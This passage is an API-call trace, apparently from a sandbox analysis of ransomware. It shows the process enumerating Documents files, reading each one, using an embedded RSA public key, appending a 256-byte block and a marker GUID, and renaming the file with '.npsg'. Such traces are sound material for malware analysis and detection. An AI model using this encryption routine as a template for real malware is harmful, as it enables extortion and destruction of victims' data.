dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.627] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=16100) returned 1 [0236.627] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.630] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x3ebe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.631] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.632] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x3ee4, lpOverlapped=0x0) returned 1 [0236.633] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.633] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.633] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.633] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0236.635] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.635] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.635] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.635] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.635] GetLastError () returned 0x0 [0236.635] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.635] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0236.635] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.635] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.635] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.635] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8f7a8 [0236.636] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x3ee4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.636] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.636] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.636] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.636] CloseHandle (hObject=0x644) returned 1 [0236.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0236.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b8f7a8 [0236.638] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D7SRnQXh-dQO9IFpl.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\d7srnqxh-dqo9ifpl.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D7SRnQXh-dQO9IFpl.docx.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\d7srnqxh-dqo9ifpl.docx.npsg")) returned 1 [0236.639] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0236.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7c900 [0236.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0236.639] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned=".ini" [0236.639] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32da4180, ftCreationTime.dwHighDateTime=0x1d5beff, ftLastAccessTime.dwLowDateTime=0xf1b6c910, ftLastAccessTime.dwHighDateTime=0x1d5b5af, ftLastWriteTime.dwLowDateTime=0xf1b6c910, ftLastWriteTime.dwHighDateTime=0x1d5b5af, nFileSizeHigh=0x0, nFileSizeLow=0x67b4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DSk7hWNiE.odt", cAlternateFileName="DSK7HW~1.ODT")) returned 1 [0236.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7c900 [0236.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0236.640] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DSk7hWNiE.odt") returned=".odt" [0236.640] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DSk7hWNiE.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dsk7hwnie.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.642] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=26548) returned 1 [0236.642] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.644] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x678e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.644] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.646] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x67b4, lpOverlapped=0x0) returned 1 [0236.646] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.646] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.646] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.646] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0236.647] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.647] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.647] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.647] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.647] GetLastError () returned 0x0 [0236.647] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.647] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0236.648] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.648] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.648] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.648] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8f7a8 [0236.648] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x67b4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.648] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.648] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.648] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.649] CloseHandle (hObject=0x644) returned 1 [0236.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0236.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x3b8f7a8 [0236.650] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DSk7hWNiE.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dsk7hwnie.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DSk7hWNiE.odt.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dsk7hwnie.odt.npsg")) returned 1 [0236.651] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a5ace20, ftCreationTime.dwHighDateTime=0x1d59c1c, ftLastAccessTime.dwLowDateTime=0x4ffe7790, ftLastAccessTime.dwHighDateTime=0x1d5bee6, ftLastWriteTime.dwLowDateTime=0x4ffe7790, ftLastWriteTime.dwHighDateTime=0x1d5bee6, nFileSizeHigh=0x0, nFileSizeLow=0x15e69, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="glQdzW4meiQxrDo.pptx", cAlternateFileName="GLQDZW~1.PPT")) returned 1 [0236.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7c900 [0236.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0236.651] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\glQdzW4meiQxrDo.pptx") returned=".pptx" [0236.651] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\glQdzW4meiQxrDo.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\glqdzw4meiqxrdo.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.652] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=89705) returned 1 [0236.652] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.654] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x15e43, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.655] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.656] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x15e69, lpOverlapped=0x0) returned 1 [0236.657] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.657] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.657] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.657] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0236.658] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.658] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.658] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.658] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.658] GetLastError () returned 0x0 [0236.658] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.658] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0236.658] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.658] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.658] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.659] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8f7a8 [0236.659] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x15e69, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.659] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.660] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.660] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.660] CloseHandle (hObject=0x644) returned 1 [0236.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0236.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b8f7a8 [0236.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0236.661] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\glQdzW4meiQxrDo.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\glqdzw4meiqxrdo.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\glQdzW4meiQxrDo.pptx.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\glqdzw4meiqxrdo.pptx.npsg")) returned 1 [0236.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f7a8 | out: hHeap=0x620000) returned 1 [0236.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.662] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0236.663] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6f856e0, ftCreationTime.dwHighDateTime=0x1d5b8ab, ftLastAccessTime.dwLowDateTime=0xd070610, ftLastAccessTime.dwHighDateTime=0x1d5c156, ftLastWriteTime.dwLowDateTime=0xd070610, ftLastWriteTime.dwHighDateTime=0x1d5c156, nFileSizeHigh=0x0, nFileSizeLow=0xac18, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H_G Ub15e5ZAiG.pptx", cAlternateFileName="H_GUB1~1.PPT")) returned 1 [0236.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7c900 [0236.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0236.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7c900 | out: hHeap=0x620000) returned 1 [0236.663] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H_G Ub15e5ZAiG.pptx") returned=".pptx" [0236.663] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H_G Ub15e5ZAiG.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h_g ub15e5zaig.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.664] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=44056) returned 1 [0236.664] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.667] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xabf2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.667] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.668] RtlAllocateHeap 